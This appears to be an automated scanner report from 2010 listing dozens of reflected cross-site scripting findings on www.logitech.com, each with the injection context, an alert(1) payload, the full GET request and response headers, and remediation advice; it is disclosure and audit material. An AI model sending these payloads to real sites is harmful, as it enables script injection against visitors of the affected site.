The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96542</script><script>alert(1)</script>e8b17153b25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /96542</script><script>alert(1)</script>e8b17153b25/change-location/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9df69"><script>alert(1)</script>42847546f58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us9df69"><script>alert(1)</script>42847546f58/change-location/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e6d</script><script>alert(1)</script>5d435621487 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/change-locationc7e6d</script><script>alert(1)</script>5d435621487/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eda2"><script>alert(1)</script>98341f67543 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/change-location5eda2"><script>alert(1)</script>98341f67543/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 813c8"><script>alert(1)</script>c2e182f6239 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us813c8"><script>alert(1)</script>c2e182f6239/compliance HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20f2e"%3bf49600e6b39 was submitted in the REST URL parameter 1. This input was echoed as 20f2e";f49600e6b39 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us20f2e"%3bf49600e6b39/compliance HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cffec</script><script>alert(1)</script>a585e417c74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cffec</script><script>alert(1)</script>a585e417c74/compliance HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892f3"><script>alert(1)</script>e9094fd938d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/compliance892f3"><script>alert(1)</script>e9094fd938d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae3</script><script>alert(1)</script>f489388c207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/complianceceae3</script><script>alert(1)</script>f489388c207 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b929</script><script>alert(1)</script>6643b911ad6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7b929</script><script>alert(1)</script>6643b911ad6/contact HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13cf9"><script>alert(1)</script>869ccff4faa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us13cf9"><script>alert(1)</script>869ccff4faa/contact HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96754"%3b384480470e7 was submitted in the REST URL parameter 1. This input was echoed as 96754";384480470e7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us96754"%3b384480470e7/contact HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 985b6"><script>alert(1)</script>e4a641c7aba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/contact985b6"><script>alert(1)</script>e4a641c7aba HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45270</script><script>alert(1)</script>d2e6391630f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/contact45270</script><script>alert(1)</script>d2e6391630f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd202"><script>alert(1)</script>a868979521a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usdd202"><script>alert(1)</script>a868979521a/corporate/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33881</script><script>alert(1)</script>9a764c5c517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /33881</script><script>alert(1)</script>9a764c5c517/corporate/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e401"><script>alert(1)</script>2c05857a6d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/corporate1e401"><script>alert(1)</script>2c05857a6d6/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 812fb</script><script>alert(1)</script>ee533f7cb58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporate812fb</script><script>alert(1)</script>ee533f7cb58/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bab7"%3b4c291b418ab was submitted in the REST URL parameter 1. This input was echoed as 1bab7";4c291b418ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us1bab7"%3b4c291b418ab/corporate/articles/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3db2e</script><script>alert(1)</script>6804abafb6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3db2e</script><script>alert(1)</script>6804abafb6d/corporate/articles/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f908a"><script>alert(1)</script>7bc06cf37f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usf908a"><script>alert(1)</script>7bc06cf37f9/corporate/articles/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1e2</script><script>alert(1)</script>d05bfbc34ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporatecf1e2</script><script>alert(1)</script>d05bfbc34ff/articles/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82aeb"><script>alert(1)</script>7d750392104 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/corporate82aeb"><script>alert(1)</script>7d750392104/articles/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36361"><script>alert(1)</script>287831aeb46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/corporate/articles36361"><script>alert(1)</script>287831aeb46/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fd72</script><script>alert(1)</script>b5003c8a242 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/corporate/articles4fd72</script><script>alert(1)</script>b5003c8a242/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7a8"><script>alert(1)</script>5b46461462b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-used7a8"><script>alert(1)</script>5b46461462b/corporate/articles/6111 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1316f</script><script>alert(1)</script>c7aa7375d53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
